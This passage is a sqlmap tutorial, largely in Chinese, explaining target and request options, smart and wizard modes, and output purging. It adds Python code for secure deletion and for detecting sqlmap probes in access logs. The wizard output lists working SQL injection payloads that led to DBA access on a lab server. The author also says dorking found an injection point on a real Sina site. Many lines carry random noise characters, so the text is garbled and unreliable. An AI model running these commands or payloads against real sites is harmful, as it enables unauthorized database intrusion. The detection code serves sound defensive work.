2. Also show debug information.

3. Also show the injected payloads.

4. Also show the HTTP requests.

5. Also show the HTTP response headers.

6. Also show the HTTP response page.

If you want to see the test payloads sqlmap sends, level 3 is the best choice.
Ways to specify the target

Target URL

Option: -u or --url

Format: http(s)://targeturl[:port]/[…]

Example: python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users
Loading request logs from a Burp or WebScarab proxy

Option: -l

You can export the log from Burp proxy or WebScarab proxy directly and hand it to sqlmap, which then tests the logged requests one by one for injection.
Scanning multiple targets listed in a text file

Option: -m

The URLs are stored in the file one per line, in the format below, and sqlmap tests them one by one:

www.target1.com/vuln1.php?q=foobar
www.target2.com/vuln2.asp?id=1
www.target3.com/vuln3/id/1*
1 y& c5 a& @; D4 B+ Q8 R- \" g- s从文件中加载HTTP请求 3 N, [ ]+ _( m! k) ^% O . @5 q5 w# P7 _, p* y. Z参数:-r0 P: O4 S) r) m- C: p, n
6 \4 A! }5 J7 m' n$ dsqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)。6 u E o* k- ?( D
0 b2 w! }5 U' c0 r" _" G比如文本文件内如下: 9 S, q# g2 p* ^9 Y ^$ C5 r7 X6 K2 x: \
POST /vuln.php HTTP/1.1: n# |# E1 x6 A
Host: www.target.com, n, L2 N$ p. B# W
User-Agent: Mozilla/4.0 # Y! v, \3 U2 C) `: Q+ S0 a& f% i ' s; C. D% d; M/ Kid=14 ^+ A1 `5 d$ d/ V! @$ r
& s% n9 P+ w' K' [4 L4 K; {当请求是HTTPS的时候你需要配合这个--force-ssl参数来使用,或者你可以在Host头后门加上:443/ r# f' G9 R0 m7 H% T
Processing Google search results

Option: -g

sqlmap can test the GET parameters found in Google search results for injection (only the first 100 results are fetched).

Example:

python sqlmap.py -g "inurl:\".php?id=1\""

(A very powerful feature; I tried it and found an injection point on a Sina site somewhere around the tenth result.)
In addition, the -c option can be used to load the relevant settings from a sqlmap.conf file.

Request

HTTP data

Option: --data

This option submits the data with the POST method; sqlmap tests the POST parameters just as it tests GET parameters.

Example:

python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users
6 Z) B' _/ c, k. L" I! h/ A参数拆分字符 8 w. {2 z1 |& z7 A% C' v* B ) h) H) N3 k1 g2 u6 W; n参数:--param-del! ^! Y6 n# {( r0 }8 Z0 m
& H5 }; e- M) x9 Q8 Y
当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。1 X. U5 }. s: \( F/ K2 h
. ~9 h/ q) g) e, @! r
例子: . L0 Z' O/ D( a1 [. {- I 4 z, L5 j2 W o! G) r1 b$ D" upython sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users) ^* s% L; \- u+ y) m
$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]
其他的一些参数 ; B) b x* r" ~$ q+ } u. C5 L4 Z- L使用参数缩写 $ o' W. H* z" c X' z* f' r0 |' e& e8 `) o9 [9 s
参数:-z ! f- B$ I, s9 D, g$ ]* V( k6 T9 b% d7 a: O [' c$ G; R7 E
有使用参数太长太复杂,可以使用缩写模式。 例如:# e, C( J6 f# u% t V$ O' [
3 X$ S" [" }" e; n4 c
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1" , _9 b; @0 I5 d$ b6 C
Example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
Securely deleting the files in the output directory

Option: --purge-output

Sometimes you need to delete the result files in a way that cannot be recovered; use this option, and the original files are overwritten with random data before being removed.

Example:

$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]
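As an added example (not sqlmap's own implementation), the purge sequence that the debug lines above describe, carried out on a constructed output tree: make files writable, overwrite them with random bytes, truncate, rename files and directories to random names, then delete the tree. purge_output and demo are illustrative names; the demo directory and its two files are constructed here, not taken from a real output directory.

```python
import os
import secrets
import shutil
import stat
import tempfile

def purge_output(directory):
    """Apply the purge steps from the debug log to `directory`; return files purged."""
    if not os.path.isdir(directory):
        return 0
    purged = 0
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            # "changing file attributes": make sure the file is writable by us
            os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
            size = os.path.getsize(path)
            with open(path, "r+b") as fh:
                # "writing random data to files" over the full original length,
                # then "truncating files" so the size reveals nothing either.
                # Caveat: in-place overwrite only helps where the filesystem
                # rewrites the same blocks; SSDs and copy-on-write filesystems
                # may keep the old blocks.
                fh.write(secrets.token_bytes(size))
                fh.flush()
                os.fsync(fh.fileno())
                fh.truncate(0)
            purged += 1
    # "renaming filenames / directory names to random values"; walk bottom-up
    # so a parent is renamed only after everything inside it has been.
    for root, dirs, files in os.walk(directory, topdown=False):
        for name in files + dirs:
            os.rename(os.path.join(root, name), os.path.join(root, secrets.token_hex(8)))
    # "deleting the whole directory tree"
    shutil.rmtree(directory)
    return purged

def demo():
    """Build a constructed output tree, purge it, report (files purged, still exists)."""
    base = tempfile.mkdtemp(prefix="sqlmap-output-")
    target_dir = os.path.join(base, "www.target.com")  # constructed target directory
    os.makedirs(target_dir)
    for name, content in (("log", "banner: constructed\n"), ("session.sqlite", "x" * 4096)):
        with open(os.path.join(target_dir, name), "w") as fh:
            fh.write(content)
    count = purge_output(base)
    return count, os.path.exists(base)
```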
: V3 e" s2 i/ Q3 j启发式判断注入 & P7 G* Z! D$ e" ]+ ]2 O* h# W' P6 u! @5 P
参数:--smart9 f/ [2 N- i$ V @0 v9 P
: l# H v$ J3 K8 j& }0 G
有时对目标非常多的URL进行测试,为节省时间,只对能够快速判断为注入的报错点进行注入,可以使用此参数。5 R0 Y- |+ ]9 b/ q2 [' o
5 ^; C. B( ?2 [% ~7 z
例子:0 ?5 F" h+ a- a! T1 w! W* g
: X' }- I$ N1 ^3 y! B1 B$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart 5 I; Q. b. N# e[...] - @* [0 F" {' q- d6 [7 \" ?2 r9 i[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic ) f/ q# d) q( k[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic6 I$ G: S ~5 H
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable 4 e& p! j: y& |- x9 ^3 }[xx:xx:14] [INFO] skipping GET parameter 'ca', l0 ?& a. a+ Q0 b/ |. X
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic4 s6 t6 q# \5 M3 ]" l
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic% @! L% d4 E& v+ I
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable M- I" ^4 Y/ P8 s
[xx:xx:14] [INFO] skipping GET parameter 'user'7 l( d& {) q! B
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic ) f% h8 D# \* H* M T6 U[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic6 |4 h5 _, [3 T# M5 _; M! ]
[xx:xx:14] [INFO] GET parameter 'id' is dynamic , N6 g8 y" L9 s8 E) \[xx:xx:14] [WARNING] reflective value(s) found and filtering out , L% C" j) H0 r3 d[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') / g; b3 A3 J6 |# W5 u! a[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'* J% r2 B* y' C1 ?" C( g9 g
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y / C) _; k0 B5 v% w* |. D6 Ydo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y2 C1 Y# b$ S- G+ Q
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'/ V3 a" S9 m5 W8 x# R p$ L
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 9 e% x4 z# R+ m' U. b
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'6 c" i5 R7 @$ B4 J5 G! f( r5 R
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable # U4 p2 j1 h6 G4 P4 ][xx:xx:14] [INFO] testing 'MySQL inline queries', c/ W9 ?3 L7 n2 G
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'0 {, K) M7 G# s) } L( y( }9 u
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' : S1 I) r5 R) g* z8 [# E4 x[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' a5 X* P6 D! J$ A/ j
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable * Y; N Q0 T, S7 R) i* @[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' * R& Z* L, o+ ]/ u0 {) ~8 H6 o[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found . Y7 ]" `' y. O: {9 k+ B[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test , X# F7 c# W$ l5 c8 O- s/ `! @% ~4 V[xx:xx:24] [INFO] target URL appears to have 3 columns in query. y6 ]; u8 A6 M
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable# n$ o- N& q6 `, R) ^) I, `
[...]% o* I6 Z* a/ r! O6 F% D) [2 Y
Wizard mode for beginners

Option: --wizard

An option aimed at beginners that walks you step by step through what to enter in order to test the target for injection.

$ python sqlmap.py --wizard
sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

starting at 11:25:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1
sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    Oct 14 2005 00:33:37
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user: 'sa'
current database: 'testdb'
current user is DBA: True
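From the defender's side, the wizard output above lists exactly the probe shapes a web server log would record when the tested application is scanned. The following is an added example, not part of the original post or the sqlmap project: a detector that looks for those shapes (the "AND n=n" boolean pair, WAITFOR DELAY, UNION ALL SELECT NULL, and runs of CHAR() concatenation) in access-log lines, keeping the User-Agent as a separate, weaker signal because --random-agent and --mobile replace it. The log lines, client addresses and timestamps are constructed; the default User-Agent format is assumed from the version banner shown above.

```python
import re
from urllib.parse import unquote_plus

# Probe shapes taken from the payloads listed in the wizard output above.
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "time-blind": re.compile(r"WAITFOR\s+DELAY\s+'[\d:]+'", re.I),
    "union-null": re.compile(r"UNION\s+ALL\s+SELECT\s+NULL\b", re.I),
    "char-concat": re.compile(r"(?:CHAR\(\d+\)\s*\+?\s*){4,}", re.I),
}

# Common Log Format with the referer and user-agent fields appended.
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                 r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Constructed access-log lines for the demo (one benign client, one scanning client).
LOG_LINES = [
    '10.0.0.9 - - [01/Jan/2014:11:25:26 +0000] "GET /sqlmap/mssql/iis/get_int.asp?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2014:11:25:27 +0000] "GET /sqlmap/mssql/iis/get_int.asp?id=1%20AND%202986%3D2986 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev-2defc30 (http://sqlmap.org)"',
    '10.0.0.5 - - [01/Jan/2014:11:25:28 +0000] "GET /sqlmap/mssql/iis/get_int.asp?id=1%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2014:11:25:29 +0000] "GET /sqlmap/mssql/iis/get_int.asp?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28118%29%2BCHAR%28114%29%2BCHAR%28100%29%2BCHAR%2858%29-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

def classify_request(path, user_agent):
    """Return the probe labels found in one request (path is URL-encoded as logged)."""
    decoded = unquote_plus(path)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    # The stock User-Agent is a strong hint on its own, but --random-agent and
    # --mobile (shown above) replace it, so treat it as a separate, weaker signal.
    if user_agent.lower().startswith("sqlmap/"):  # assumed format of the default UA
        hits.append("sqlmap-ua")
    return hits

def scan_log_lines(lines):
    """Map each client IP to the set of probe labels seen across its requests."""
    findings = {}
    for line in lines:
        match = CLF.match(line)
        if not match:
            continue  # not in the expected log format; skip rather than guess
        for label in classify_request(match["path"], match["ua"]):
            findings.setdefault(match["ip"], set()).add(label)
    return findings
```

A client that accumulates several distinct labels in a short window is a much stronger indicator than any single match, since a lone "AND n=n" can occur in ordinary traffic.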